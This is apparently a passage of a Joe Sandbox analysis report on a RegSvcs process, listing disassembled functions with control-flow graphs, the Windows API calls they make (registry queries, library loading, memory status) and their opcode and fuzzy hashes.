                                                                                                                          control_flow_graph 2166 6c6eee9-6c6ef07 2167 6c6ef2c-6c6efb1 2166->2167 2168 6c6ef09-6c6ef13 2166->2168 2174 6c6efb3-6c6efb6 2167->2174 2175 6c6efb9-6c6efc3 2167->2175 2169 6c6ef15-6c6ef26 2168->2169 2170 6c6ef28-6c6ef2b 2168->2170 2169->2170 2174->2175 2176 6c6efc5-6c6efcd 2175->2176 2177 6c6efcf-6c6f011 RegQueryValueExW 2175->2177 2176->2177 2178 6c6f013-6c6f019 2177->2178 2179 6c6f01a-6c6f054 2177->2179 2178->2179 2183 6c6f056 2179->2183 2184 6c6f05e 2179->2184 2183->2184 2185 6c6f05f 2184->2185 2185->2185
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06C6F001
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: b4fd687245d79ee68482af6c2acc77ef4115c1b4c7188f84821d1d8a10a5df89
                                                                                                                          • Instruction ID: 8f43170946221ec01d7f21bcac093841c645aa47e80546c86d3a67a4e1678d3f
                                                                                                                          • Opcode Fuzzy Hash: b4fd687245d79ee68482af6c2acc77ef4115c1b4c7188f84821d1d8a10a5df89
                                                                                                                          • Instruction Fuzzy Hash: B14165B5D002489FCB50CFAAD880ADEBBF5AF48300F14806EE819AB350D7749906CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6EC31 Relevance: 1.6, APIs: 1, Instructions: 115registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2186 6c6ec31-6c6ec4f 2188 6c6ec74-6c6ece0 2186->2188 2189 6c6ec51-6c6ec5b 2186->2189 2195 6c6ece2-6c6ece5 2188->2195 2196 6c6ece8 2188->2196 2190 6c6ec70-6c6ec73 2189->2190 2191 6c6ec5d-6c6ec6e 2189->2191 2191->2190 2195->2196 2197 6c6ecf2-6c6ed54 RegOpenKeyExW 2196->2197 2198 6c6ed56-6c6ed5c 2197->2198 2199 6c6ed5d-6c6ed95 2197->2199 2198->2199 2203 6c6ed97-6c6eda0 2199->2203 2204 6c6eda8 2199->2204 2203->2204 2205 6c6eda9 2204->2205 2205->2205
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06C6ED44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: b7c93b47f377f76b6f20e05a5bd306344fac5d715c8b38aca94168386254c0cb
                                                                                                                          • Instruction ID: 68475fffddf484662b7f4c9447f89609fd8f75dc62863aaf8068cf29af3807ca
                                                                                                                          • Opcode Fuzzy Hash: b7c93b47f377f76b6f20e05a5bd306344fac5d715c8b38aca94168386254c0cb
                                                                                                                          • Instruction Fuzzy Hash: C14176B9D043498FDB04CFA9C584B9EBFF1BF49304F28816AE409AB351C7759949CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 01699B8C Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2206 1699b8c-169c887 2208 169c889-169c893 2206->2208 2209 169c8c0-169c90a LoadLibraryA 2206->2209 2208->2209 2210 169c895-169c897 2208->2210 2214 169c90c-169c912 2209->2214 2215 169c913-169c944 2209->2215 2212 169c899-169c8a3 2210->2212 2213 169c8ba-169c8bd 2210->2213 2216 169c8a5 2212->2216 2217 169c8a7-169c8b6 2212->2217 2213->2209 2214->2215 2221 169c954 2215->2221 2222 169c946-169c94a 2215->2222 2216->2217 2217->2217 2219 169c8b8 2217->2219 2219->2213 2224 169c955 2221->2224 2222->2221 2223 169c94c 2222->2223 2223->2221 2224->2224
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0169C8FA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: e2524e07949ed88fb94bcd2e80082e324731a70ba838aa1daff4c1c9552a26c8
                                                                                                                          • Instruction ID: 71a81810a047c889b8afc48d4eb2dcc7807f9f03c652f1c9fac251988f6594a4
                                                                                                                          • Opcode Fuzzy Hash: e2524e07949ed88fb94bcd2e80082e324731a70ba838aa1daff4c1c9552a26c8
                                                                                                                          • Instruction Fuzzy Hash: C93134B1D102499FDF14CFA9C9857AEBFB5BB08324F148129E815EB380D7789845CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6DBB0 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2244 6c6dbb0-6c6efb1 2247 6c6efb3-6c6efb6 2244->2247 2248 6c6efb9-6c6efc3 2244->2248 2247->2248 2249 6c6efc5-6c6efcd 2248->2249 2250 6c6efcf-6c6f011 RegQueryValueExW 2248->2250 2249->2250 2251 6c6f013-6c6f019 2250->2251 2252 6c6f01a-6c6f054 2250->2252 2251->2252 2256 6c6f056 2252->2256 2257 6c6f05e 2252->2257 2256->2257 2258 6c6f05f 2257->2258 2258->2258
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06C6F001
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: f72aa01700675bda948355b843364b37e0fbb7e1d1c38e2af0e18d3b644e3d3c
                                                                                                                          • Instruction ID: 3e136fe9eced3f574db3149a533f22efb0545ee8139681126a9ab9423edab9fc
                                                                                                                          • Opcode Fuzzy Hash: f72aa01700675bda948355b843364b37e0fbb7e1d1c38e2af0e18d3b644e3d3c
                                                                                                                          • Instruction Fuzzy Hash: E131EEB1D00258DFCB20CF9AD884A9EBBF5BF48314F24802EE819AB310D7759945CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0169C824 Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2225 169c824-169c887 2227 169c889-169c893 2225->2227 2228 169c8c0-169c90a LoadLibraryA 2225->2228 2227->2228 2229 169c895-169c897 2227->2229 2233 169c90c-169c912 2228->2233 2234 169c913-169c944 2228->2234 2231 169c899-169c8a3 2229->2231 2232 169c8ba-169c8bd 2229->2232 2235 169c8a5 2231->2235 2236 169c8a7-169c8b6 2231->2236 2232->2228 2233->2234 2240 169c954 2234->2240 2241 169c946-169c94a 2234->2241 2235->2236 2236->2236 2238 169c8b8 2236->2238 2238->2232 2243 169c955 2240->2243 2241->2240 2242 169c94c 2241->2242 2242->2240 2243->2243
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0169C8FA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: a61f61a80e735ee539c2d5130ed886bcf969b3fc2cf54f113a132a6a7fac92f3
                                                                                                                          • Instruction ID: 7085590a87a6ff39222b07571e9db808058a0d6eea4a86fb031309c2be695f37
                                                                                                                          • Opcode Fuzzy Hash: a61f61a80e735ee539c2d5130ed886bcf969b3fc2cf54f113a132a6a7fac92f3
                                                                                                                          • Instruction Fuzzy Hash: 013112B1D102498FDF14CFA8C9857AEBFB5BB48324F148129E816AB380D7799845CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6DBA4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06C6ED44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: 01ab9c6e84ef4f7f69301ecbafa24e1fbbb0cec7aa20ab9e3082581dbbb45f5a
                                                                                                                          • Instruction ID: 68369c3670c518da424d78a3c2b001f7fb0ae481664f9427a64d9eceea14a45d
                                                                                                                          • Opcode Fuzzy Hash: 01ab9c6e84ef4f7f69301ecbafa24e1fbbb0cec7aa20ab9e3082581dbbb45f5a
                                                                                                                          • Instruction Fuzzy Hash: 9931F0B5D042499FDB10CF9AC584A8EFFF5BF48304F28816EE809AB341C7759985CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C69148 Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2880 6c69148-6c69167 2881 6c6918c-6c691d6 2880->2881 2882 6c69169-6c69173 2880->2882 2889 6c691df-6c691f4 LdrInitializeThunk 2881->2889 2883 6c69175-6c69186 2882->2883 2884 6c69188-6c6918b 2882->2884 2883->2884 2890 6c691fb-6c69207 2889->2890 2891 6c69425-6c69438 2890->2891 2892 6c6920d-6c69216 2890->2892 2893 6c6945f-6c69463 2891->2893 2894 6c6921c-6c69231 2892->2894 2895 6c6945a 2892->2895 2896 6c69465 2893->2896 2897 6c6946e 2893->2897 2899 6c69233-6c69246 2894->2899 2900 6c6924b-6c69266 2894->2900 2895->2893 2896->2897 2901 6c6946f 2897->2901 2902 6c693f9-6c693fd 2899->2902 2911 6c69274 2900->2911 2912 6c69268-6c69272 2900->2912 2901->2901 2904 6c693ff 2902->2904 2905 6c69408-6c69411 2902->2905 2904->2905 2908 6c69455 2905->2908 2909 6c69413-6c6941f 2905->2909 2908->2895 2909->2891 2909->2892 2913 6c69279-6c6927b 2911->2913 2912->2913 2914 6c69295-6c69330 2913->2914 2915 6c6927d-6c69290 2913->2915 2933 6c69332-6c6933c 2914->2933 2934 6c6933e 2914->2934 2915->2902 2935 6c69343-6c69345 2933->2935 2934->2935 2936 6c69347-6c69349 2935->2936 2937 6c693a3-6c693f7 2935->2937 2938 6c69357 2936->2938 2939 6c6934b-6c69355 2936->2939 2937->2902 2940 6c6935c-6c6935e 2938->2940 2939->2940 2940->2937 2942 6c69360-6c693a1 2940->2942 2942->2937
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5661fc3b4b429b27fb5d59a6ea4736933ba56d8ea96afa5c8548587cad609f53
                                                                                                                          • Instruction ID: 38144e573d27bb91bee1acbbe59e086134f943e46f239f56b5d3d46aecc8f722
                                                                                                                          • Opcode Fuzzy Hash: 5661fc3b4b429b27fb5d59a6ea4736933ba56d8ea96afa5c8548587cad609f53
                                                                                                                          • Instruction Fuzzy Hash: B231BE70E05246CFDB55DFB5C8987ADBBB2EF46300F1484A9D005AB2A1DB78C846CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D1C5F4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1CC06,?,?,?,?,?), ref: 06D1CCC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 7b00d2a75e06a75acdb57c4536175808091edc0ce2b9563d0fbb5ab1c040c6f8
                                                                                                                          • Instruction ID: 2d44d937b42feae2d7c92878ada71906d833fb5687abe5eda740bbb3e747206a
                                                                                                                          • Opcode Fuzzy Hash: 7b00d2a75e06a75acdb57c4536175808091edc0ce2b9563d0fbb5ab1c040c6f8
                                                                                                                          • Instruction Fuzzy Hash: 8821E5B5D00248EFDB10CF9AD984BEEBBF5EB48320F14841AE914A7710D378A944CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D1CC38 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1CC06,?,?,?,?,?), ref: 06D1CCC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 6c1720020303f8ce1fd5934e444ada90419c929136776d4eba59f7c4378de248
                                                                                                                          • Instruction ID: e0a1685a71098ef00df086a4526ff335ae2a977a8d4825c628a98901972b08e3
                                                                                                                          • Opcode Fuzzy Hash: 6c1720020303f8ce1fd5934e444ada90419c929136776d4eba59f7c4378de248
                                                                                                                          • Instruction Fuzzy Hash: 5F21E9B5D00249AFDB10CFA9D984BDEBBF4EB48314F14841AE914A7750D378A944CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 01694C0F Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 01694C9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 5d4610c35e478c7ccc93cc299b0fc6a57f2ccdb12449220e0a7be6178196b168
                                                                                                                          • Instruction ID: f6e4aadab5fb4f24ce9a40bb6bd9eab6c16b22aa198373f64d4d440e4f1b25f2
                                                                                                                          • Opcode Fuzzy Hash: 5d4610c35e478c7ccc93cc299b0fc6a57f2ccdb12449220e0a7be6178196b168
                                                                                                                          • Instruction Fuzzy Hash: 4C217770900385CFDF20DFA9C988BAABBF4FB49319F24842AC449E7645D739A545CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9D440 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: xk
                                                                                                                          • API String ID: 0-664891089
                                                                                                                          • Opcode ID: b476017bbc0e2db2bf668f9a99d235dc007a508b59b6eb3b75b8e06eb5072f47
                                                                                                                          • Instruction ID: 41f1688e97ab8981fb3713b0d426d69585c5aabe8fb432c77855b3c0c0ae9d52
                                                                                                                          • Opcode Fuzzy Hash: b476017bbc0e2db2bf668f9a99d235dc007a508b59b6eb3b75b8e06eb5072f47
                                                                                                                          • Instruction Fuzzy Hash: 16B1AB30E00A498FDFA5CF65C5406ADBBF3AF86354F248169E406AF391EB74E841CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D16800 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D18252), ref: 06D1833F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1890195054-0
                                                                                                                          • Opcode ID: b3da8b470bebca4788144c1871cf056f2a67c0913e0cbfb352d900b34f1002c3
                                                                                                                          • Instruction ID: 9dfd73543b0d453b0c790c0eaf7790209c0bab484097bb8c1261805ec395e20a
                                                                                                                          • Opcode Fuzzy Hash: b3da8b470bebca4788144c1871cf056f2a67c0913e0cbfb352d900b34f1002c3
                                                                                                                          • Instruction Fuzzy Hash: 321103B1D006599BCB10DF9AD8447DEFBB4AB48324F14812AE818B7740D3B8A945CFE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D182D0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06D18252), ref: 06D1833F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1890195054-0
                                                                                                                          • Opcode ID: 9dfc7dbd7d48825aed46f0fcc1f309b1305dcbf05567ca2239a003df6a4c9fe9
                                                                                                                          • Instruction ID: 243f47717b75826cbbbf59cbbb8d08cd3dc1e6bbfdb34970f386ed1e82fc3a51
                                                                                                                          • Opcode Fuzzy Hash: 9dfc7dbd7d48825aed46f0fcc1f309b1305dcbf05567ca2239a003df6a4c9fe9
                                                                                                                          • Instruction Fuzzy Hash: E011F2B2D006599BCB10CF9AD8447DEFBB4AB48324F14812AD418B7640D378AA45CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 01694C20 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 01694C9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527885213.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_1690000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: f610576cd5bc3eec843992f4212fec773762e0b8310a2407211a285d9c61a1eb
                                                                                                                          • Instruction ID: 956023aed0bbcd28bad30e1770791e8f217dcdaf7b6a1a5878e17dc279311e34
                                                                                                                          • Opcode Fuzzy Hash: f610576cd5bc3eec843992f4212fec773762e0b8310a2407211a285d9c61a1eb
                                                                                                                          • Instruction Fuzzy Hash: 86118970900385CFDF20DFAAC94879EBBF8EB48318F10842AC409A7645DB79A945CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9A410 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: \
                                                                                                                          • API String ID: 0-2967466578
                                                                                                                          • Opcode ID: d8e26ced0b8386cc47180beada01d4602966a9a707b578c405d0bd3549ea1a93
                                                                                                                          • Instruction ID: 27bcd7c6b7cadbc8a7ae1ca01b7e4bb7eac5cfbb585cd8122a124639e37bacaa
                                                                                                                          • Opcode Fuzzy Hash: d8e26ced0b8386cc47180beada01d4602966a9a707b578c405d0bd3549ea1a93
                                                                                                                          • Instruction Fuzzy Hash: 7A21F872F001159FDF94DBA888057BFB7F6EF84210F18812AD119E7281EB7499018BF1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9AEE8 Relevance: .5, Instructions: 467COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4e8364b9a060b9363cb3feaa9c099534963947bf436439ed94d7bc2029f19681
                                                                                                                          • Instruction ID: 9125f8630f7ace386292375be4e5aff7567db48ecf7ae71f96bebc2cdeef11db
                                                                                                                          • Opcode Fuzzy Hash: 4e8364b9a060b9363cb3feaa9c099534963947bf436439ed94d7bc2029f19681
                                                                                                                          • Instruction Fuzzy Hash: CDF1A070E102098FCF94EBB4D9946AEB7B6EF89314F21842AD405EB354EB34DD41CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9F420 Relevance: .4, Instructions: 366COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 873006281fda8222b9a5b35270d22e192d6a130446414ba001522fb9c1a0cf7a
                                                                                                                          • Instruction ID: 3de53bae3764e1182eedf03f890e277f0c865b2f72128cd47fa2465c8ecbf580
                                                                                                                          • Opcode Fuzzy Hash: 873006281fda8222b9a5b35270d22e192d6a130446414ba001522fb9c1a0cf7a
                                                                                                                          • Instruction Fuzzy Hash: 39D1C070A002058FCBA4DFA8D444BAEB7E6FF85314F20C56AD55ADB395DB34D846CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 015FE16A Relevance: .4, Instructions: 364COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527066289.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_15fd000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b1e9d833765642b51781ef3fc08b9e6cd66206d3223164276c3bb9b8d70c4e6
                                                                                                                          • Instruction ID: 7e5a2c51ffa292ccbfb75ca2030e970076ed354aded74a2da326912c977011a8
                                                                                                                          • Opcode Fuzzy Hash: 5b1e9d833765642b51781ef3fc08b9e6cd66206d3223164276c3bb9b8d70c4e6
                                                                                                                          • Instruction Fuzzy Hash: C7A1B33151E7D18FDB03CB74C9E5A917FB0AF03254B1946DBD485CE1ABD22AA909CB22
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C2A8 Relevance: .3, Instructions: 292COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 892275c1e2378aa6d20af49a18e134b00650aa36115c97b0cf75f0de21cbf683
                                                                                                                          • Instruction ID: b366e5cc3a4f4f8e00657a5c7f360dc08ade1e9ab3ac021cf15b362e2c340a44
                                                                                                                          • Opcode Fuzzy Hash: 892275c1e2378aa6d20af49a18e134b00650aa36115c97b0cf75f0de21cbf683
                                                                                                                          • Instruction Fuzzy Hash: F4A14E34B102058FDF94EBB8D86566E77E2AFC9355B148429E506DB394EF38DC028BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D96860 Relevance: .3, Instructions: 257COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9e11e043f1b9429fd9bc487f7e43f83796260e14d8ae0eadc080c565f8214b23
                                                                                                                          • Instruction ID: 49ec1099120ab74a7fb621b2f050ffc9c639b5e229cced8957cc6530ee9e2198
                                                                                                                          • Opcode Fuzzy Hash: 9e11e043f1b9429fd9bc487f7e43f83796260e14d8ae0eadc080c565f8214b23
                                                                                                                          • Instruction Fuzzy Hash: FBB19C71A00289DFDF45CFA4C844ADEBFB2FF89314F05815AE445AB2A5E730E955CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

